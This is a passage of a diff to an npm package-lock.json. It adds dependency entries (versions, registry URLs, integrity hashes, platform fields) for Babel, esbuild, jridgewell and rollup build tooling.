"sha512-qSs4ifwzKJSV39ucNjsvc6WVHs6b7S03sOh2OcHF9UHfVPqWWALUsNUVzhSBiItjRZoLHx7nIarVjqKVusUZ1Q==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-validator-option": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.27.1.tgz", + "integrity": "sha512-YvjJow9FxbhFFKDSuFnVCe2WxXk1zWc22fFePVNEaWJEu8IrZVlda6N0uHwzZrUM1il7NC9Mlp4MaJYbYd9JSg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helpers": { + "version": "7.29.2", + "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.29.2.tgz", + "integrity": "sha512-HoGuUs4sCZNezVEKdVcwqmZN8GoHirLUcLaYVNBK2J0DadGtdcqgr3BCbvH8+XUo4NGjNl3VOtSjEKNzqfFgKw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/template": "^7.28.6", + "@babel/types": "^7.29.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/parser": { + "version": "7.29.3", + "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.29.3.tgz", + "integrity": "sha512-b3ctpQwp+PROvU/cttc4OYl4MzfJUWy6FZg+PMXfzmt/+39iHVF0sDfqay8TQM3JA2EUOyKcFZt75jWriQijsA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/types": "^7.29.0" + }, + "bin": { + "parser": "bin/babel-parser.js" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@babel/plugin-transform-react-jsx-self": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-react-jsx-self/-/plugin-transform-react-jsx-self-7.27.1.tgz", + "integrity": "sha512-6UzkCs+ejGdZ5mFFC/OCUrv028ab2fp1znZmCZjAOBKiBK2jXD1O+BPSfX8X2qjJ75fZBMSnQn3Rq2mrBJK2mw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/helper-plugin-utils": "^7.27.1" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-react-jsx-source": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-react-jsx-source/-/plugin-transform-react-jsx-source-7.27.1.tgz", + "integrity": "sha512-zbwoTsBruTeKB9hSq73ha66iFeJHuaFkUbwvqElnygoNbj/jHRsSeokowZFN3CZ64IvEqcmmkVe89OPXc7ldAw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/helper-plugin-utils": "^7.27.1" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/template": { + "version": "7.28.6", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.28.6.tgz", + "integrity": "sha512-YA6Ma2KsCdGb+WC6UpBVFJGXL58MDA6oyONbjyF/+5sBgxY/dwkhLogbMT2GXXyU84/IhRw/2D1Os1B/giz+BQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/code-frame": "^7.28.6", + "@babel/parser": "^7.28.6", + "@babel/types": "^7.28.6" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/traverse": { + "version": "7.29.0", + "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.29.0.tgz", + "integrity": "sha512-4HPiQr0X7+waHfyXPZpWPfWL/J7dcN1mx9gL6WdQVMbPnF3+ZhSMs8tCxN7oHddJE9fhNE7+lxdnlyemKfJRuA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/code-frame": "^7.29.0", + "@babel/generator": "^7.29.0", + "@babel/helper-globals": "^7.28.0", + "@babel/parser": "^7.29.0", + "@babel/template": "^7.28.6", + "@babel/types": "^7.29.0", + "debug": "^4.3.1" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/types": { + "version": "7.29.0", + "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.29.0.tgz", + "integrity": "sha512-LwdZHpScM4Qz8Xw2iKSzS+cfglZzJGvofQICy7W7v4caru4EaAmyUuO6BGrbyQ2mYV11W0U8j5mBhd14dd3B0A==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/helper-string-parser": "^7.27.1", + "@babel/helper-validator-identifier": "^7.28.5" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@esbuild/aix-ppc64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.21.5.tgz", + "integrity": "sha512-1SDgH6ZSPTlggy1yI6+Dbkiz8xzpHJEVAlF/AM1tHPLsf5STom9rwtjE4hKAF20FfXXNTFqEYXyJNWh1GiZedQ==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "aix" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/android-arm": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.21.5.tgz", + "integrity": "sha512-vCPvzSjpPHEi1siZdlvAlsPxXl7WbOVUBBAowWug4rJHb68Ox8KualB+1ocNvT5fjv6wpkX6o/iEpbDrf68zcg==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/android-arm64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.21.5.tgz", + "integrity": "sha512-c0uX9VAUBQ7dTDCjq+wdyGLowMdtR/GoC2U5IYk/7D1H1JYC0qseD7+11iMP2mRLN9RcCMRcjC4YMclCzGwS/A==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/android-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.21.5.tgz", + "integrity": "sha512-D7aPRUUNHRBwHxzxRvp856rjUHRFW1SdQATKXH2hqA0kAZb1hKmi02OpYRacl0TxIGz/ZmXWlbZgjwWYaCakTA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/darwin-arm64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.21.5.tgz", + "integrity": "sha512-DwqXqZyuk5AiWWf3UfLiRDJ5EDd49zg6O9wclZ7kUMv2WRFr4HKjXp/5t8JZ11QbQfUS6/cRCKGwYhtNAY88kQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/darwin-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.21.5.tgz", + "integrity": "sha512-se/JjF8NlmKVG4kNIuyWMV/22ZaerB+qaSi5MdrXtd6R08kvs2qCN4C09miupktDitvh8jRFflwGFBQcxZRjbw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/freebsd-arm64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.21.5.tgz", + "integrity": "sha512-5JcRxxRDUJLX8JXp/wcBCy3pENnCgBR9bN6JsY4OmhfUtIHe3ZW0mawA7+RDAcMLrMIZaf03NlQiX9DGyB8h4g==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/freebsd-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.21.5.tgz", + "integrity": "sha512-J95kNBj1zkbMXtHVH29bBriQygMXqoVQOQYA+ISs0/2l3T9/kj42ow2mpqerRBxDJnmkUDCaQT/dfNXWX/ZZCQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-arm": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.21.5.tgz", + "integrity": "sha512-bPb5AHZtbeNGjCKVZ9UGqGwo8EUu4cLq68E95A53KlxAPRmUyYv2D6F0uUI65XisGOL1hBP5mTronbgo+0bFcA==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-arm64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.21.5.tgz", + "integrity": "sha512-ibKvmyYzKsBeX8d8I7MH/TMfWDXBF3db4qM6sy+7re0YXya+K1cem3on9XgdT2EQGMu4hQyZhan7TeQ8XkGp4Q==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-ia32": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.21.5.tgz", + "integrity": "sha512-YvjXDqLRqPDl2dvRODYmmhz4rPeVKYvppfGYKSNGdyZkA01046pLWyRKKI3ax8fbJoK5QbxblURkwK/MWY18Tg==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-loong64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.21.5.tgz", + "integrity": "sha512-uHf1BmMG8qEvzdrzAqg2SIG/02+4/DHB6a9Kbya0XDvwDEKCoC8ZRWI5JJvNdUjtciBGFQ5PuBlpEOXQj+JQSg==", + "cpu": [ + "loong64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-mips64el": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.21.5.tgz", + "integrity": "sha512-IajOmO+KJK23bj52dFSNCMsz1QP1DqM6cwLUv3W1QwyxkyIWecfafnI555fvSGqEKwjMXVLokcV5ygHW5b3Jbg==", + "cpu": [ + "mips64el" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-ppc64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.21.5.tgz", + "integrity": "sha512-1hHV/Z4OEfMwpLO8rp7CvlhBDnjsC3CttJXIhBi+5Aj5r+MBvy4egg7wCbe//hSsT+RvDAG7s81tAvpL2XAE4w==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-riscv64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.21.5.tgz", + "integrity": "sha512-2HdXDMd9GMgTGrPWnJzP2ALSokE/0O5HhTUvWIbD3YdjME8JwvSCnNGBnTThKGEB91OZhzrJ4qIIxk/SBmyDDA==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-s390x": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.21.5.tgz", + "integrity": "sha512-zus5sxzqBJD3eXxwvjN1yQkRepANgxE9lgOW2qLnmr8ikMTphkjgXu1HR01K4FJg8h1kEEDAqDcZQtbrRnB41A==", + "cpu": [ + "s390x" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.21.5.tgz", + "integrity": "sha512-1rYdTpyv03iycF1+BhzrzQJCdOuAOtaqHTWJZCWvijKD2N5Xu0TtVC8/+1faWqcP9iBCWOmjmhoH94dH82BxPQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/netbsd-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.21.5.tgz", + "integrity": "sha512-Woi2MXzXjMULccIwMnLciyZH4nCIMpWQAs049KEeMvOcNADVxo0UBIQPfSmxB3CWKedngg7sWZdLvLczpe0tLg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/openbsd-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.21.5.tgz", + "integrity": "sha512-HLNNw99xsvx12lFBUwoT8EVCsSvRNDVxNpjZ7bPn947b8gJPzeHWyNVhFsaerc0n3TsbOINvRP2byTZ5LKezow==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/sunos-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.21.5.tgz", + "integrity": "sha512-6+gjmFpfy0BHU5Tpptkuh8+uw3mnrvgs+dSPQXQOv3ekbordwnzTVEb4qnIvQcYXq6gzkyTnoZ9dZG+D4garKg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "sunos" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/win32-arm64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.21.5.tgz", + "integrity": "sha512-Z0gOTd75VvXqyq7nsl93zwahcTROgqvuAcYDUr+vOv8uHhNSKROyU961kgtCD1e95IqPKSQKH7tBTslnS3tA8A==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/win32-ia32": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.21.5.tgz", + "integrity": "sha512-SWXFF1CL2RVNMaVs+BBClwtfZSvDgtL//G/smwAc5oVK/UPu2Gu9tIaRgFmYFFKrmg3SyAjSrElf0TiJ1v8fYA==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@jridgewell/gen-mapping": { + "version": "0.3.13", + "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.13.tgz", + "integrity": "sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/sourcemap-codec": "^1.5.0", + "@jridgewell/trace-mapping": "^0.3.24" + } + }, + "node_modules/@jridgewell/remapping": { + "version": "2.3.5", + "resolved": "https://registry.npmjs.org/@jridgewell/remapping/-/remapping-2.3.5.tgz", + "integrity": "sha512-LI9u/+laYG4Ds1TDKSJW2YPrIlcVYOwi2fUC6xB43lueCjgxV4lffOCZCtYFiH6TNOX+tQKXx97T4IKHbhyHEQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/gen-mapping": "^0.3.5", + "@jridgewell/trace-mapping": "^0.3.24" + } + }, + "node_modules/@jridgewell/resolve-uri": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz", + "integrity": "sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@jridgewell/sourcemap-codec": { + "version": "1.5.5", + "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.5.tgz", + "integrity": "sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og==", + "dev": true, + "license": "MIT" + }, + "node_modules/@jridgewell/trace-mapping": { + "version": "0.3.31", + "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.31.tgz", + "integrity": "sha512-zzNR+SdQSDJzc8joaeP8QQoCQr8NuYx2dIIytl1QeBEZHJ9uW6hebsrYgbz8hJwUQao3TWCMtmfV8Nu1twOLAw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/resolve-uri": "^3.1.0", + "@jridgewell/sourcemap-codec": "^1.4.14" + } + }, + "node_modules/@rolldown/pluginutils": { + "version": "1.0.0-beta.27", + "resolved": "https://registry.npmjs.org/@rolldown/pluginutils/-/pluginutils-1.0.0-beta.27.tgz", + "integrity": "sha512-+d0F4MKMCbeVUJwG96uQ4SgAznZNSq93I3V+9NHA4OpvqG8mRCpGdKmK8l/dl02h2CCDHwW2FqilnTyDcAnqjA==", + "dev": true, + "license": "MIT" + }, + "node_modules/@rollup/rollup-android-arm-eabi": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-android-arm-eabi/-/rollup-android-arm-eabi-4.60.3.tgz", + "integrity": "sha512-x35CNW/ANXG3hE/EZpRU8MXX1JDN86hBb2wMGAtltkz7pc6cxgjpy1OMMfDosOQ+2hWqIkag/fGok1Yady9nGw==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ] + }, + "node_modules/@rollup/rollup-android-arm64": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-android-arm64/-/rollup-android-arm64-4.60.3.tgz", + "integrity": "sha512-xw3xtkDApIOGayehp2+Rz4zimfkaX65r4t47iy+ymQB2G4iJCBBfj0ogVg5jpvjpn8UWn/+q9tprxleYeNp3Hw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ] + }, + "node_modules/@rollup/rollup-darwin-arm64": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-darwin-arm64/-/rollup-darwin-arm64-4.60.3.tgz", + "integrity": "sha512-vo6Y5Qfpx7/5EaamIwi0WqW2+zfiusVihKatLvtN1VFVy3D13uERk/6gZLU1UiHRL6fDXqj/ELIeVRGnvcTE1g==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ] + }, + "node_modules/@rollup/rollup-darwin-x64": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-darwin-x64/-/rollup-darwin-x64-4.60.3.tgz", + "integrity": "sha512-D+0QGcZhBzTN82weOnsSlY7V7+RMmPuF1CkbxyMAGE8+ZHeUjyb76ZiWmBlCu//AQQONvxcqRbwZTajZKqjuOw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ] + }, + "node_modules/@rollup/rollup-freebsd-arm64": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-freebsd-arm64/-/rollup-freebsd-arm64-4.60.3.tgz", + "integrity": "sha512-6HnvHCT7fDyj6R0Ph7A6x8dQS/S38MClRWeDLqc0MdfWkxjiu1HSDYrdPhqSILzjTIC/pnXbbJbo+ft+gy/9hQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ] + }, + "node_modules/@rollup/rollup-freebsd-x64": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-freebsd-x64/-/rollup-freebsd-x64-4.60.3.tgz", + "integrity": "sha512-KHLgC3WKlUYW3ShFKnnosZDOJ0xjg9zp7au3sIm2bs/tGBeC2ipmvRh/N7JKi0t9Ue20C0dpEshi8WUubg+cnA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ] + }, + "node_modules/@rollup/rollup-linux-arm-gnueabihf": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm-gnueabihf/-/rollup-linux-arm-gnueabihf-4.60.3.tgz", + "integrity": "sha512-DV6fJoxEYWJOvaZIsok7KrYl0tPvga5OZ2yvKHNNYyk/2roMLqQAbGhr78EQ5YhHpnhLKJD3S1WFusAkmUuV5g==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-arm-musleabihf": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm-musleabihf/-/rollup-linux-arm-musleabihf-4.60.3.tgz", + "integrity": "sha512-mQKoJAzvuOs6F+TZybQO4GOTSMUu7v0WdxEk24krQ/uUxXoPTtHjuaUuPmFhtBcM4K0ons8nrE3JyhTuCFtT/w==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-arm64-gnu": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm64-gnu/-/rollup-linux-arm64-gnu-4.60.3.tgz", + "integrity": "sha512-Whjj2qoiJ6+OOJMGptTYazaJvjOJm+iKHpXQM1P3LzGjt7Ff++Tp7nH4N8J/BUA7R9IHfDyx4DJIflifwnbmIA==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-arm64-musl": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm64-musl/-/rollup-linux-arm64-musl-4.60.3.tgz", + "integrity": "sha512-4YTNHKqGng5+yiZt3mg77nmyuCfmNfX4fPmyUapBcIk+BdwSwmCWGXOUxhXbBEkFHtoN5boLj/5NON+u5QC9tg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-loong64-gnu": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-loong64-gnu/-/rollup-linux-loong64-gnu-4.60.3.tgz", + "integrity": "sha512-SU3kNlhkpI4UqlUc2VXPGK9o886ZsSeGfMAX2ba2b8DKmMXq4AL7KUrkSWVbb7koVqx41Yczx6dx5PNargIrEA==", + "cpu": [ + "loong64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-loong64-musl": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-loong64-musl/-/rollup-linux-loong64-musl-4.60.3.tgz", + "integrity": "sha512-6lDLl5h4TXpB1mTf2rQWnAk/LcXrx9vBfu/DT5TIPhvMhRWaZ5MxkIc8u4lJAmBo6klTe1ywXIUHFjylW505sg==", + "cpu": [ + "loong64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-ppc64-gnu": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-ppc64-gnu/-/rollup-linux-ppc64-gnu-4.60.3.tgz", + "integrity": "sha512-BMo8bOw8evlup/8G+cj5xWtPyp93xPdyoSN16Zy90Q2QZ0ZYRhCt6ZJSwbrRzG9HApFabjwj2p25TUPDWrhzqQ==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-ppc64-musl": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-ppc64-musl/-/rollup-linux-ppc64-musl-4.60.3.tgz", + "integrity": "sha512-E0L8X1dZN1/Rph+5VPF6Xj2G7JJvMACVXtamTJIDrVI44Y3K+G8gQaMEAavbqCGTa16InptiVrX6eM6pmJ+7qA==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-riscv64-gnu": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-riscv64-gnu/-/rollup-linux-riscv64-gnu-4.60.3.tgz", + "integrity": "sha512-oZJ/WHaVfHUiRAtmTAeo3DcevNsVvH8mbvodjZy7D5QKvCefO371SiKRpxoDcCxB3PTRTLayWBkvmDQKTcX/sw==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-riscv64-musl": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-riscv64-musl/-/rollup-linux-riscv64-musl-4.60.3.tgz", + "integrity": "sha512-Dhbyh7j9FybM3YaTgaHmVALwA8AkUwTPccyCQ79TG9AJUsMQqgN1DDEZNr4+QUfwiWvLDumW5vdwzoeUF+TNxQ==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-s390x-gnu": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-s390x-gnu/-/rollup-linux-s390x-gnu-4.60.3.tgz", + "integrity": "sha512-cJd1X5XhHHlltkaypz1UcWLA8AcoIi1aWhsvaWDskD1oz2eKCypnqvTQ8ykMNI0RSmm7NkTdSqSSD7zM0xa6Ig==", + "cpu": [ + "s390x" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-x64-gnu": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-x64-gnu/-/rollup-linux-x64-gnu-4.60.3.tgz", + "integrity": "sha512-DAZDBHQfG2oQuhY7mc6I3/qB4LU2fQCjRvxbDwd/Jdvb9fypP4IJ4qmtu6lNjes6B531AI8cg1aKC2di97bUxA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-x64-musl": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-x64-musl/-/rollup-linux-x64-musl-4.60.3.tgz", + "integrity": "sha512-cRxsE8c13mZOh3vP+wLDxpQBRrOHDIGOWyDL93Sy0Ga8y515fBcC2pjUfFwUe5T7tqvTvWbCpg1URM/AXdWIXA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-openbsd-x64": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-openbsd-x64/-/rollup-openbsd-x64-4.60.3.tgz", + "integrity": "sha512-QaWcIgRxqEdQdhJqW4DJctsH6HCmo5vHxY0krHSX4jMtOqfzC+dqDGuHM87bu4H8JBeibWx7jFz+h6/4C8wA5Q==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ] + }, + "node_modules/@rollup/rollup-openharmony-arm64": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-openharmony-arm64/-/rollup-openharmony-arm64-4.60.3.tgz", + "integrity": "sha512-AaXwSvUi3QIPtroAUw1t5yHGIyqKEXwH54WUocFolZhpGDruJcs8c+xPNDRn4XiQsS7MEwnYsHW2l0MBLDMkWg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openharmony" + ] + }, + "node_modules/@rollup/rollup-win32-arm64-msvc": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-arm64-msvc/-/rollup-win32-arm64-msvc-4.60.3.tgz", + "integrity": "sha512-65LAKM/bAWDqKNEelHlcHvm2V+Vfb8C6INFxQXRHCvaVN1rJfwr4NvdP4FyzUaLqWfaCGaadf6UbTm8xJeYfEg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@rollup/rollup-win32-ia32-msvc": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-ia32-msvc/-/rollup-win32-ia32-msvc-4.60.3.tgz", + "integrity": 